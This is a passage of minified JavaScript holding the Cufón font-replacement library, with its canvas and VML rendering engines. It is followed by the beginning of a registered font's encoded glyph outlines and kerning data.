var Cufon=(function(){var L=function(){return L.replace.apply(null,arguments)};var W=L.DOM={ready:(function(){var b=false,d={loaded:1,complete:1};var a=[],c=function(){if(b){return}b=true;for(var e;e=a.shift();e()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",c,false);window.addEventListener("pageshow",c,false)}if(!window.opera&&document.readyState){(function(){d[document.readyState]?c():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");c()}catch(f){setTimeout(arguments.callee,1)}})()}P(window,"load",c);return function(e){if(!arguments.length){c()}else{b?e():a.push(e)}}})()};var M=L.CSS={Size:function(b,a){this.value=parseFloat(b);this.unit=String(b).match(/[a-z%]*$/)[0]||"px";this.convert=function(c){return c/a*this.value};this.convertFrom=function(c){return c/this.value*a};this.toString=function(){return this.value+this.unit}},color:I(function(b){var a={};a.color=b.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(d,c,e){a.opacity=parseFloat(e);return"rgb("+c+")"});return a}),getStyle:function(b){var a=document.defaultView;if(a&&a.getComputedStyle){return new A(a.getComputedStyle(b,null))}if(b.currentStyle){return new A(b.currentStyle)}return new A(b.style)},gradient:I(function(e){var f={id:e,type:e.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},b=e.substr(e.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var d=0,a=b.length,c;d<a;++d){c=b[d].split("=",2).reverse();f.stops.push([c[1]||d/(a-1),c[0]])}return f}),quotedList:I(function(d){var c=[],b=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,a;while(a=b.exec(d)){c.push(a[3]||a[1])}return c}),recognizesMedia:I(function(g){var d=document.createElement("style"),c,b,a;d.type="text/css";d.media=g;try{d.appendChild(document.createTextNode("/**/"))}catch(f){}b=F("head")[0];b.insertBefore(d,b.firstChild);c=(d.sheet||d.styleSheet);a=c&&!c.disabled;b.removeChild(d);return a}),supports:function(c,b){var a=document.createElement("span").style;if(a[c]===undefined){return false}a[c]=b;return a[c]===b},textAlign:function(d,c,a,b){if(c.get("textAlign")=="right"){if(a>0){d=" "+d}}else{if(a<b-1){d+=" "}}return d},textDecoration:function(f,e){if(!e){e=this.getStyle(f)}var b={underline:null,overline:null,"line-through":null};for(var a=f;a.parentNode&&a.parentNode.nodeType==1;){var d=true;for(var c in b){if(!J(b,c)||b[c]){continue}if(e.get("textDecoration").indexOf(c)!=-1){b[c]=e.get("color")}d=false}if(d){break}e=this.getStyle(a=a.parentNode)}return b},textShadow:I(function(e){if(e=="none"){return null}var d=[],f={},a,b=0;var c=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(a=c.exec(e)){if(a[0]==","){d.push(f);f={},b=0}else{if(a[1]){f.color=a[1]}else{f[["offX","offY","blur"][b++]]=a[2]}}}d.push(f);return d}),textTransform:function(b,a){return b[{uppercase:"toUpperCase",lowercase:"toLowerCase"}[a.get("textTransform")]||"toString"]()},whiteSpace:(function(){var a={inline:1,"inline-block":1,"run-in":1};return function(d,b,c){if(a[b.get("display")]){return d}if(!c.previousSibling){d=d.replace(/^\s+/,"")}if(!c.nextSibling){d=d.replace(/\s+$/,"")}return d}})()};M.ready=(function(){var a=!M.recognizesMedia("all"),d=false;var c=[],g=function(){a=true;for(var j;j=c.shift();j()){}};var h=F("link"),i=F("style");function b(j){return j.disabled||f(j.sheet,j.media||"screen")}function f(m,o){if(!M.recognizesMedia(o||"all")){return true}if(!m||m.disabled){return false}var p=m.cssRules,n;if(p){search:for(var k=0,j=p.length;n=p[k],k<j;++k){switch(n.type){case 2:break;case 3:if(!f(n.styleSheet,n.media.mediaText)){return false}break;default:break search}}}return true}function e(){if(document.createStyleSheet){return true}var k,j;for(j=0;k=h[j];++j){if(k.rel.toLowerCase()=="stylesheet"&&!b(k)){return false}}for(j=0;k=i[j];++j){if(!b(k)){return false}}return true}W.ready(function(){if(!d){d=M.getStyle(document.body).isUsable()}if(a||(d&&e())){g()}else{setTimeout(arguments.callee,10)}});return function(j){if(a){j()}else{c.push(j)}}})();function R(b){var a=this.face=b.face;this.glyphs=b.glyphs;this.w=b.w;this.baseSize=parseInt(a["units-per-em"],10);this.family=a["font-family"].toLowerCase();this.weight=a["font-weight"];this.style=a["font-style"]||"normal";this.viewBox=(function(){var d=a.bbox.split(/\s+/);var c={minX:parseInt(d[0],10),minY:parseInt(d[1],10),maxX:parseInt(d[2],10),maxY:parseInt(d[3],10)};c.width=c.maxX-c.minX,c.height=c.maxY-c.minY;c.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return c})();this.ascent=-parseInt(a.ascent,10);this.descent=-parseInt(a.descent,10);this.height=-this.ascent+this.descent}function E(){var b={},a={oblique:"italic",italic:"oblique"};this.add=function(c){(b[c.style]||(b[c.style]={}))[c.weight]=c};this.get=function(g,h){var f=b[g]||b[a[g]]||b.normal||b.italic||b.oblique;if(!f){return null}h={normal:400,bold:700}[h]||parseInt(h,10);if(f[h]){return f[h]}var d={1:1,99:0}[h%100],j=[],e,c;if(d===undefined){d=h>400}if(h==500){h=400}for(var i in f){if(!J(f,i)){continue}i=parseInt(i,10);if(!e||i<e){e=i}if(!c||i>c){c=i}j.push(i)}if(h<e){h=e}if(h>c){h=c}j.sort(function(l,k){return(d?(l>h&&k>h)?l<k:l>k:(l<h&&k<h)?l>k:l<k)?-1:1});return f[j[0]]}}function Q(){function c(e,f){if(e.contains){return e.contains(f)}return e.compareDocumentPosition(f)&16}function a(g){var f=g.relatedTarget;if(!f||c(this,f)){return}b(this)}function d(f){b(this)}function b(e){setTimeout(function(){L.replace(e,D.get(e).options,true)},10)}this.attach=function(e){if(e.onmouseenter===undefined){P(e,"mouseover",a);P(e,"mouseout",a)}else{P(e,"mouseenter",d);P(e,"mouseleave",d)}}}function T(){var b=[],c={};function a(g){var d=[],f;for(var e=0;f=g[e];++e){d[e]=b[c[f]]}return d}this.add=function(e,d){c[e]=b.push(d)-1};this.repeat=function(){var d=arguments.length?a(arguments):b,e;for(var f=0;e=d[f++];){L.replace(e[0],e[1],true)}}}function Z(){var c={},a=0;function b(d){return d.cufid||(d.cufid=++a)}this.get=function(d){var e=b(d);return c[e]||(c[e]={})}}function A(a){var c={},b={};this.extend=function(d){for(var e in d){if(J(d,e)){c[e]=d[e]}}return this};this.get=function(d){return c[d]!=undefined?c[d]:a[d]};this.getSize=function(e,d){return b[e]||(b[e]=new M.Size(this.get(e),d))};this.isUsable=function(){return!!a}}function P(b,a,c){if(b.addEventListener){b.addEventListener(a,c,false)}else{if(b.attachEvent){b.attachEvent("on"+a,function(){return c.call(b,window.event)})}}}function U(b,a){var c=D.get(b);if(c.options){return b}if(a.hover&&a.hoverables[b.nodeName.toLowerCase()]){B.attach(b)}c.options=a;return b}function I(a){var b={};return function(c){if(!J(b,c)){b[c]=a.apply(null,arguments)}return b[c]}}function C(f,e){if(!e){e=M.getStyle(f)}var b=M.quotedList(e.get("fontFamily").toLowerCase()),d;for(var c=0,a=b.length;c<a;++c){d=b[c];if(H[d]){return H[d].get(e.get("fontStyle"),e.get("fontWeight"))}}return null}function F(a){return document.getElementsByTagName(a)}function J(b,a){return b.hasOwnProperty(a)}function G(){var a={},c,e;for(var d=0,b=arguments.length;c=arguments[d],d<b;++d){for(e in c){if(J(c,e)){a[e]=c[e]}}}return a}function N(d,n,b,o,e,c){var m=o.separate;if(m=="none"){return Y[o.engine].apply(null,arguments)}var k=document.createDocumentFragment(),g;var h=n.split(O[m]),a=(m=="words");if(a&&S){if(/^\s/.test(n)){h.unshift("")}if(/\s$/.test(n)){h.push("")}}for(var j=0,f=h.length;j<f;++j){g=Y[o.engine](d,a?M.textAlign(h[j],b,j,f):h[j],b,o,e,c,j<f-1);if(g){k.appendChild(g)}}return k}function K(b,j){var c,a,d,g,f,i;for(d=U(b,j).firstChild;d;d=f){g=d.nodeType;f=d.nextSibling;i=false;if(g==1){if(!d.firstChild){continue}if(!/cufon/.test(d.className)){arguments.callee(d,j);continue}else{i=true}}else{if(g!=3){continue}}if(!a){a=M.getStyle(b).extend(j)}if(!c){c=C(b,a)}if(!c){continue}if(i){Y[j.engine](c,null,a,j,d,b);continue}var h=M.whiteSpace(d.data,a,d);if(h===""){continue}var e=N(c,h,a,j,d,b);if(e){d.parentNode.replaceChild(e,d)}else{d.parentNode.removeChild(d)}}}var S=" ".split(/\s+/).length==0;var D=new Z();var B=new Q();var X=new T();var Y={},H={},V={enableTextDecoration:false,engine:null,hover:false,hoverables:{a:true},printable:true,selector:(window.Sizzle||(window.jQuery&&function(a){return jQuery(a)})||(window.dojo&&dojo.query)||(window.$$&&function(a){return $$(a)})||(window.$&&function(a){return $(a)})||(document.querySelectorAll&&function(a){return document.querySelectorAll(a)})||F),separate:"words",textShadow:"none"};var O={words:/[^\S\u00a0]+/,characters:""};L.now=function(){W.ready();return L};L.refresh=function(){X.repeat.apply(X,arguments);return L};L.registerEngine=function(b,a){if(!a){return L}Y[b]=a;return L.set("engine",b)};L.registerFont=function(c){var a=new R(c),b=a.family;if(!H[b]){H[b]=new E()}H[b].add(a);return L.set("fontFamily",'"'+b+'"')};L.replace=function(c,b,a){b=G(V,b);if(!b.engine){return L}if(typeof b.textShadow=="string"){b.textShadow=M.textShadow(b.textShadow)}if(typeof b.color=="string"&&/^-/.test(b.color)){b.textGradient=M.gradient(b.color)}if(!a){X.add(c,arguments)}if(c.nodeType||typeof c=="string"){c=[c]}M.ready(function(){for(var e=0,d=c.length;e<d;++e){var f=c[e];if(typeof f=="string"){L.replace(b.selector(f),b,true)}else{K(f,b)}}});return L};L.set=function(a,b){V[a]=b;return L};return L})();Cufon.registerEngine("canvas",(function(){var B=document.createElement("canvas");if(!B||!B.getContext||!B.getContext.apply){return}B=null;var A=Cufon.CSS.supports("display","inline-block");var E=!A&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var F=document.createElement("style");F.type="text/css";F.appendChild(document.createTextNode((".cufon-canvas{text-indent:0;}@media screen,projection{.cufon-canvas{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(E?"":"font-size:1px;line-height:1px;")+"}.cufon-canvas .cufon-alt{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;}"+(A?".cufon-canvas canvas{position:relative;}":".cufon-canvas canvas{position:absolute;}")+"}@media print{.cufon-canvas{padding:0;}.cufon-canvas canvas{display:none;}.cufon-canvas .cufon-alt{display:inline;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(F);function D(O,H){var M=0,L=0;var G=[],N=/([mrvxe])([^a-z]*)/g,J;generate:for(var I=0;J=N.exec(O);++I){var K=J[2].split(",");switch(J[1]){case"v":G[I]={m:"bezierCurveTo",a:[M+~~K[0],L+~~K[1],M+~~K[2],L+~~K[3],M+=~~K[4],L+=~~K[5]]};break;case"r":G[I]={m:"lineTo",a:[M+=~~K[0],L+=~~K[1]]};break;case"m":G[I]={m:"moveTo",a:[M=~~K[0],L=~~K[1]]};break;case"x":G[I]={m:"closePath"};break;case"e":break generate}H[G[I].m].apply(H,G[I].a)}return G}function C(K,J){for(var I=0,H=K.length;I<H;++I){var G=K[I];J[G.m].apply(J,G.a)}}return function(AD,Z,u,V,d,AE){var I=(Z===null);if(I){Z=d.alt}var b=AD.viewBox;var K=u.getSize("fontSize",AD.baseSize);var s=u.get("letterSpacing");s=(s=="normal")?0:K.convertFrom(parseInt(s,10));var c=0,t=0,r=0,X=0;var a=V.textShadow,p=[];if(a){for(var AC=a.length;AC--;){var h=a[AC];var o=K.convertFrom(parseFloat(h.offX));var n=K.convertFrom(parseFloat(h.offY));p[AC]=[o,n];if(n<c){c=n}if(o>t){t=o}if(n>r){r=n}if(o<X){X=o}}}var AH=Cufon.CSS.textTransform(Z,u).split(""),T;var J=AD.glyphs,W,M,w;var G=0,P,f=[];for(var AC=0,AA=0,v=AH.length;AC<v;++AC){W=J[T=AH[AC]]||AD.missingGlyph;if(!W){continue}if(M){G-=w=M[T]||0;f[AA-1]-=w}G+=P=f[AA++]=~~(W.w||AD.w)+s;M=W.k}if(P===undefined){return null}t+=b.width-P;X+=b.minX;var U,L;if(I){U=d;L=d.firstChild}else{U=document.createElement("span");U.className="cufon cufon-canvas";U.alt=Z;L=document.createElement("canvas");U.appendChild(L);if(V.printable){var z=document.createElement("span");z.className="cufon-alt";z.appendChild(document.createTextNode(Z));U.appendChild(z)}}var AI=U.style;var m=L.style;var H=K.convert(b.height);var AG=Math.ceil(H);var q=AG/H;L.width=Math.ceil(K.convert(G*q+t-X));L.height=Math.ceil(K.convert(b.height-c+r));c+=b.minY;m.top=Math.round(K.convert(c-AD.ascent))+"px";m.left=Math.round(K.convert(X))+"px";var S=Math.ceil(K.convert(G*q))+"px";if(A){AI.width=S;AI.height=K.convert(AD.height)+"px"}else{AI.paddingLeft=S;AI.paddingBottom=(K.convert(AD.height)-1)+"px"}var AF=L.getContext("2d"),e=H/b.height;AF.scale(e,e*q);AF.translate(-X,-c);AF.lineWidth=AD.face["underline-thickness"];AF.save();function N(i,g){AF.strokeStyle=g;AF.beginPath();AF.moveTo(0,i);AF.lineTo(G,i);AF.stroke()}var O=V.enableTextDecoration?Cufon.CSS.textDecoration(AE,u):{};if(O.underline){N(-AD.face["underline-position"],O.underline)}if(O.overline){N(AD.ascent,O.overline)}function AB(){AF.scale(q,1);for(var x=0,k=0,g=AH.length;x<g;++x){var y=J[AH[x]]||AD.missingGlyph;if(!y){continue}if(y.d){AF.beginPath();if(y.code){C(y.code,AF)}else{y.code=D("m"+y.d,AF)}AF.fill()}AF.translate(f[k++],0)}AF.restore()}if(a){for(var AC=a.length;AC--;){var h=a[AC];AF.save();AF.fillStyle=h.color;AF.translate.apply(AF,p[AC]);AB()}}var R=V.textGradient;if(R){var Y=R.stops,Q=AF.createLinearGradient(0,b.minY,0,b.maxY);for(var AC=0,v=Y.length;AC<v;++AC){Q.addColorStop.apply(Q,Y[AC])}AF.fillStyle=Q}else{AF.fillStyle=u.get("color")}AB();if(O["line-through"]){N(-AD.descent,O["line-through"])}return U}})());Cufon.registerEngine("vml",(function(){if(!document.namespaces){return}if(document.namespaces.cvml==null){document.namespaces.add("cvml","urn:schemas-microsoft-com:vml")}var B=document.createElement("cvml:shape");B.style.behavior="url(#default#VML)";if(!B.coordsize){return}B=null;document.write(('<style type="text/css">.cufon-vml-canvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}.cufon-vml-canvas{position:absolute;text-align:left;}.cufon-vml{display:inline-block;position:relative;vertical-align:middle;}.cufon-vml .cufon-alt{position:absolute;left:-10000in;font-size:1px;}a .cufon-vml{cursor:pointer}}@media print{.cufon-vml *{display:none;}.cufon-vml .cufon-alt{display:inline;}}</style>').replace(/;/g,"!important;"));function C(F,G){return A(F,/(?:em|ex|%)$/i.test(G)?"1em":G)}function A(I,J){if(/px$/i.test(J)){return parseFloat(J)}var H=I.style.left,G=I.runtimeStyle.left;I.runtimeStyle.left=I.currentStyle.left;I.style.left=J;var F=I.style.pixelLeft;I.style.left=H;I.runtimeStyle.left=G;return F}var E={};function D(K){var L=K.id;if(!E[L]){var I=K.stops,J=document.createElement("cvml:fill"),F=[];J.type="gradient";J.angle=180;J.focus="0";J.method="sigma";J.color=I[0][1];for(var H=1,G=I.length-1;H<G;++H){F.push(I[H][0]*100+"% "+I[H][1])}J.colors=F.join(",");J.color2=I[G][1];E[L]=J}return E[L]}return function(AB,b,v,Y,f,AC,t){var I=(b===null);if(I){b=f.alt}var d=AB.viewBox;var K=v.computedFontSize||(v.computedFontSize=new Cufon.CSS.Size(C(AC,v.get("fontSize"))+"px",AB.baseSize));var s=v.computedLSpacing;if(s==undefined){s=v.get("letterSpacing");v.computedLSpacing=s=(s=="normal")?0:~~K.convertFrom(A(AC,s))}var V,L;if(I){V=f;L=f.firstChild}else{V=document.createElement("span");V.className="cufon cufon-vml";V.alt=b;L=document.createElement("span");L.className="cufon-vml-canvas";V.appendChild(L);if(Y.printable){var y=document.createElement("span");y.className="cufon-alt";y.appendChild(document.createTextNode(b));V.appendChild(y)}if(!t){V.appendChild(document.createElement("cvml:shape"))}}var AH=V.style;var n=L.style;var G=K.convert(d.height),AE=Math.ceil(G);var r=AE/G;var q=d.minX,p=d.minY;n.height=AE;n.top=Math.round(K.convert(p-AB.ascent));n.left=Math.round(K.convert(q));AH.height=K.convert(AB.height)+"px";var P=Y.enableTextDecoration?Cufon.CSS.textDecoration(AC,v):{};var a=v.get("color");var AG=Cufon.CSS.textTransform(b,v).split(""),U;var J=AB.glyphs,Z,M,x;var F=0,g=[],o=0,Q;var S,c=Y.textShadow;for(var AA=0,z=0,w=AG.length;AA<w;++AA){Z=J[U=AG[AA]]||AB.missingGlyph;if(!Z){continue}if(M){F-=x=M[U]||0;g[z-1]-=x}F+=Q=g[z++]=~~(Z.w||AB.w)+s;M=Z.k}if(Q===undefined){return null}var T=-q+F+(d.width-Q);var AF=K.convert(T*r),u=Math.round(AF);var m=T+","+d.height,H;var e="r"+m+"ns";var R=Y.textGradient&&D(Y.textGradient);for(AA=0,z=0;AA<w;++AA){Z=J[AG[AA]]||AB.missingGlyph;if(!Z){continue}if(I){S=L.childNodes[z];while(S.firstChild){S.removeChild(S.firstChild)}}else{S=document.createElement("cvml:shape");L.appendChild(S)}S.stroked="f";S.coordsize=m;S.coordorigin=H=(q-o)+","+p;S.path=(Z.d?"m"+Z.d+"xe":"")+"m"+H+e;S.fillcolor=a;if(R){S.appendChild(R.cloneNode(false))}var AD=S.style;AD.width=u;AD.height=AE;if(c){var O=c[0],N=c[1];var X=Cufon.CSS.color(O.color),W;var h=document.createElement("cvml:shadow");h.on="t";h.color=X.color;h.offset=O.offX+","+O.offY;if(N){W=Cufon.CSS.color(N.color);h.type="double";h.color2=W.color;h.offset2=N.offX+","+N.offY}h.opacity=X.opacity||(W&&W.opacity)||1;S.appendChild(h)}o+=g[z++]}AH.width=Math.max(Math.ceil(K.convert(F*r)),0);return V}})());;Cufon.registerFont((function(f){_cufon_bridge_={p:[{"d":"39,-75v-6,56,57,89,91,53r0,-70v-6,-20,-24,-37,-50,-37v-30,0,-38,25,-41,54xm7,-66v0,-62,70,-88,124,-61v2,-13,22,-7,35,-8v-8,11,-8,17,-8,34r0,158v-1,22,12,25,31,27r0,4r-103,0r0,-4v23,-3,45,1,44,-24r0,-68v-48,30,-123,6,-123,-58","w":193},{"d":"59,-207v-14,-13,-33,-19,-53,-24r0,-4r81,0r128,156v9,11,14,20,20,26v-6,-69,23,-172,-45,-178r0,-4r98,0r0,4v-29,4,-39,14,-40,45r0,190r-13,0v-48,-75,-107,-141,-164,-204r-1,100v0,56,-5,97,48,97r0,4r-112,0r0,-4v29,-2,49,-8,49,-39","w":293},{"d":"74,-156v-34,0,-43,-24,-66,-34v-11,-5,-18,-29,4,-28v27,14,41,42,62,62","w":93},{"d":"3,-3v44,2,20,-59,26,-102v-2,-14,-10,-21,-26,-22r0,-5r54,-4r0,106v0,20,8,28,29,27r0,4r-83,0r0,-4xm21,-222v0,-10,8,-21,19,-20v10,0,19,10,19,20v0,10,-9,20,-19,20v-11,1,-19,-10,-19,-20","w":93},{"d":"-22,-241r126,248r18,0r-126,-248r-18,0","w":100},{"d":"9,-66v1,-61,61,-85,123,-66r5,54r-5,0v-10,-24,-21,-51,-53,-51v-30,0,-40,29,-41,60v-3,57,68,76,103,42r5,6v-41,46,-139,28,-137,-45","w":159},{"d":"40,-241v13,0,12,15,11,29r-6,80v-1,6,-9,7,-10,0r-7,-89v0,-12,2,-19,12,-20","w":79},{"d":"52,-87v41,2,85,48,108,-2r13,13v-10,28,-54,41,-82,19v-20,-16,-66,-17,-71,13r-13,-13v9,-15,19,-31,45,-30"},{"d":"61,-209v-19,1,-22,19,-30,32r-5,-1r13,-57r125,0r2,5r-86,94v49,-11,79,20,77,66v-2,48,-33,76,-84,76v-34,0,-64,-13,-65,-48v0,-11,5,-21,18,-21v18,0,18,20,15,35v1,17,19,23,36,23v61,5,66,-120,10,-120v-18,0,-23,6,-33,16r-7,-5r79,-95r-65,0"},{"d":"75,-273v0,-11,8,-19,19,-19v11,0,19,9,19,19v0,10,-9,19,-19,19v-10,0,-19,-8,-19,-19xm141,-273v0,-10,8,-19,19,-19v12,0,19,8,19,19v0,11,-8,19,-19,19v-10,0,-19,-9,-19,-19xm145,-3v20,-2,40,-12,32,-35r-23,-66r-76,0r-26,75v1,17,18,23,34,26r0,4r-87,0v19,-12,42,-29,47,-58r66,-162r-5,-11v15,-4,18,-7,32,-11r74,206v9,17,17,30,41,32r0,4r-109,0r0,-4xm117,-206r-35,91r68,0","w":253},{"d":"73,-158r11,-76r-18,0r-11,76r-40,0r2,15r36,0r-7,52r-40,0r1,15r37,0r-11,76r18,0r11,-76r47,0r-10,76r18,0r10,-76r38,0r-2,-15r-33,0r7,-52r37,0r-1,-15r-34,0r10,-76r-18,0r-10,76r-48,0xm119,-143r-8,52r-47,0r8,-52r47,0"},{"d":"9,-66v0,-48,30,-72,77,-72v47,0,77,24,77,72v0,47,-30,72,-77,72v-47,0,-77,-25,-77,-72xm93,-5v59,0,48,-125,-13,-122v-29,1,-40,28,-40,56v0,37,16,66,53,66"},{"d":"141,-64v30,-9,43,-43,43,-79v0,-15,-5,-23,-16,-23v-32,0,-49,35,-51,72v-1,19,8,29,24,30xm194,-83v-3,10,1,23,13,22v35,-3,49,-37,49,-74v0,-58,-45,-97,-106,-97v-70,0,-101,52,-103,124v-3,89,105,127,178,86r5,9v-23,9,-45,20,-76,20v-81,-2,-135,-45,-135,-119v0,-79,52,-129,131,-129v70,0,119,39,119,106v0,44,-23,83,-67,86v-18,1,-29,-13,-33,-26v-10,12,-22,24,-42,25v-24,1,-36,-18,-34,-44v3,-44,25,-83,71,-86v16,-1,20,8,25,18r4,-14r24,0","w":288},{"d":"284,-111v3,129,-141,112,-270,112r0,-4v20,-3,36,-6,36,-27r-1,-180v-3,-16,-15,-19,-35,-21r0,-4v44,2,86,-4,129,-4v82,0,139,46,141,128xm245,-119v0,-82,-79,-133,-161,-101r-2,193v14,12,33,19,57,19v74,1,105,-39,106,-111","w":299},{"d":"56,-58v-10,31,-1,54,34,54v81,0,50,-113,55,-188v2,-31,-18,-37,-46,-39r0,-4r112,0r0,4v-22,2,-34,8,-34,32r0,137v-3,49,-42,69,-92,69v-38,0,-72,-16,-75,-56v-2,-30,43,-35,46,-9","w":226},{"d":"104,-231v-34,-3,-40,30,-24,55r50,132r44,-110v-13,-30,-20,-77,-59,-77r0,-4r107,0v1,6,-5,4,-10,5v-23,3,-26,21,-17,44r54,142v20,-57,46,-106,62,-167v-2,-14,-18,-19,-33,-20r0,-4r89,0v-16,10,-42,23,-46,47r-82,192r-6,0r-53,-143r-60,143r-6,0r-73,-194v-10,-24,-17,-38,-45,-41r0,-4r108,0r0,4","w":360,"k":{"y":6,"u":6,"r":6,"o":13,"i":6,"e":13,"a":13,"A":27,";":20,":":20,".":40,"-":27,",":40}},{"d":"23,-180v0,-12,8,-19,19,-19v11,0,19,8,19,19v0,11,-8,19,-19,19v-11,0,-19,-8,-19,-19xm89,-180v0,-11,8,-19,19,-19v11,0,19,8,19,19v0,12,-8,19,-19,19v-11,0,-19,-8,-19,-19xm19,-105v6,-24,23,-33,54,-33v30,0,49,11,52,40v3,29,-12,78,15,84v12,1,20,-19,27,-9v-14,17,-43,43,-63,14r-6,-6v-24,22,-93,36,-93,-15v0,-43,50,-43,93,-45v2,-30,0,-55,-29,-55v-13,0,-20,16,-20,30xm35,-35v0,32,49,24,63,10r0,-36v-27,-7,-63,-3,-63,26","w":166},{"d":"55,-207v-20,1,-22,19,-31,31r-4,-1r15,-58r140,0r2,5v-51,65,-112,140,-135,230r-30,0v25,-85,89,-142,133,-207r-90,0"},{"d":"74,-3v53,4,41,-52,42,-101r-88,-109v-8,-8,-21,-15,-35,-18r0,-4r115,0r0,4v-31,1,-36,30,-14,49r51,69v16,-30,43,-58,52,-94v0,-14,-15,-24,-29,-24r0,-4r97,0r0,4v-34,8,-51,34,-67,59r-50,72v0,49,-10,102,44,97r0,4r-118,0r0,-4","w":259,"k":{"v":13,"u":20,"q":27,"p":20,"o":27,"i":13,"e":27,"a":27,"A":33,";":27,":":27,".":33,"-":27,",":33}},{"d":"75,-156v-20,0,-36,-17,-36,-37v0,-20,16,-37,36,-37v21,0,37,17,37,37v0,20,-16,37,-37,37xm75,-215v-12,0,-22,10,-22,22v0,13,10,23,22,22v13,0,23,-10,23,-22v0,-11,-10,-22,-23,-22xm19,-105v6,-24,23,-33,54,-33v30,0,49,11,52,40v3,29,-12,78,15,84v12,1,20,-19,27,-9v-14,17,-43,43,-63,14r-6,-6v-24,22,-93,36,-93,-15v0,-43,50,-43,93,-45v2,-30,0,-55,-29,-55v-13,0,-20,16,-20,30xm35,-35v0,32,49,24,63,10r0,-36v-27,-7,-63,-3,-63,26","w":166},{"d":"9,-66v0,-62,68,-93,112,-57v12,10,18,26,21,47r-105,0v-7,63,66,81,99,44r6,5v-34,52,-133,39,-133,-39xm108,-86v6,-45,-57,-55,-68,-15v-1,5,-2,10,-2,15r70,0","w":159},{"d":"30,-108v0,-14,-12,-15,-25,-16r0,-4r53,-8r0,19v27,-31,98,-28,98,29v0,34,-14,87,25,85r0,4r-78,0r0,-4v36,1,20,-47,24,-79v5,-42,-42,-48,-66,-26v-8,22,-2,57,-3,84v-1,17,11,18,27,21r0,4r-81,0r0,-4v44,0,26,-66,26,-105","w":193},{"d":"37,66r95,0r0,-12r-64,0r0,-283r64,0r0,-12r-95,0r0,307","w":140},{"d":"271,61v-88,56,-147,-68,-229,-28r-5,-5v80,-59,197,82,265,-14v13,9,-8,20,-12,30v-6,7,-12,12,-19,17xm150,7v-80,0,-133,-45,-133,-124v0,-79,53,-124,133,-124v80,0,133,43,133,124v0,81,-53,124,-133,124xm150,-228v-63,0,-95,48,-95,111v0,63,32,111,95,111v63,0,95,-47,95,-111v0,-64,-32,-111,-95,-111","w":299},{"d":"5,-248v53,44,122,111,89,208v-16,48,-52,84,-90,112r-3,-4v38,-40,70,-81,70,-156v0,-74,-33,-118,-71,-156","w":140},{"d":"27,-223v0,-18,-10,-22,-27,-22r0,-4r56,-7r-2,134v41,-34,121,-10,121,51v0,81,-97,94,-148,54r0,-206xm98,-5v32,-2,45,-27,45,-61v0,-34,-12,-59,-45,-61v-38,-2,-46,24,-46,61v0,37,9,63,46,61","w":193},{"d":"156,-15r-115,-49r115,-53r0,-18r-132,62r0,18r132,57r0,-17"},{"d":"57,-120v5,50,-21,125,41,117r0,4r-95,0r0,-4v46,-1,19,-76,26,-117r-18,0r2,-11r16,0v-3,-64,6,-122,64,-125v21,-1,42,12,41,33v-1,12,-2,15,-14,15v-9,0,-8,-5,-9,-18v-1,-12,-8,-25,-24,-23v-43,5,-27,72,-30,118r46,0r0,11r-46,0","w":113},{"d":"103,-26v0,21,20,20,38,23r0,4r-106,0r0,-4v26,-2,39,-9,39,-39r0,-136v3,-32,-8,-43,-37,-42r0,-5v25,0,43,-11,66,-15r0,214"},{"d":"99,-125v-19,0,-40,8,-44,22r0,71v4,14,24,28,44,27v31,0,44,-28,44,-60v-1,-33,-12,-58,-44,-60xm175,-66v0,62,-71,88,-120,60r0,60v-3,30,17,28,44,30r0,4r-102,0v-1,-7,9,-5,13,-6v12,-3,17,-10,17,-25r0,-157v0,-21,-9,-24,-27,-27r0,-4r55,-5r0,15v43,-37,120,-11,120,55","w":193},{"d":"13,-3v24,-2,37,-8,37,-32r-1,-167v-3,-21,-13,-27,-36,-29r0,-4r117,0r0,4v-31,4,-48,9,-48,44r0,173v72,17,124,-16,148,-65r5,0r-28,80r-194,0r0,-4","w":233,"k":{"y":6,"Y":40,"W":40,"V":40,"T":33}},{"d":"121,-85v7,-46,-50,-44,-64,-19v5,37,-17,101,25,101r0,4r-79,0r0,-4v45,-1,21,-67,25,-109v-4,-10,-11,-11,-24,-13r0,-4r53,-7r0,18v21,-21,72,-30,89,0v26,-29,102,-28,96,29v4,34,-14,88,26,86r0,4r-77,0r0,-4v35,1,20,-50,23,-82v3,-39,-43,-42,-65,-24v6,38,-18,105,25,106r0,4r-76,0r0,-4v36,0,18,-50,23,-82","w":280},{"d":"63,-88v54,9,1,130,45,156r0,4v-60,6,-49,-62,-49,-118v0,-25,-4,-35,-22,-42v59,-15,-28,-156,71,-160r0,5v-44,16,10,143,-45,155","w":140},{"d":"120,-125v12,-8,43,-21,50,0r-1,15r-19,7v7,-18,-11,-26,-24,-15v26,52,-30,95,-82,67v-7,4,-18,9,-17,21v2,25,44,12,70,12v34,0,56,12,56,46v0,44,-38,62,-84,62v-34,0,-66,-11,-67,-49v1,-15,8,-26,17,-35v-23,-18,-6,-58,17,-63v-29,-26,-9,-81,38,-81v19,0,35,3,46,13xm79,68v27,-2,61,-5,61,-33v0,-44,-71,-23,-114,-27v-18,36,15,63,53,60xm77,-129v-20,1,-28,16,-28,38v0,21,8,39,28,39v36,0,39,-78,0,-77"},{"d":"7,-63v0,-63,73,-95,120,-60r0,-94v2,-22,-10,-29,-30,-29r0,-5r59,-5r0,220v-2,23,7,33,30,32r0,4r-58,1r0,-13v-40,35,-121,14,-121,-51xm82,-6v22,0,37,-11,45,-24r0,-69v-5,-18,-23,-29,-45,-29v-61,0,-60,121,0,122","w":193},{"d":"-11,41v21,-3,22,23,13,33v39,13,61,-31,73,-61v-18,-45,-39,-95,-62,-134v-6,-5,-12,-6,-22,-9r0,-4r84,0r0,4v-47,8,-1,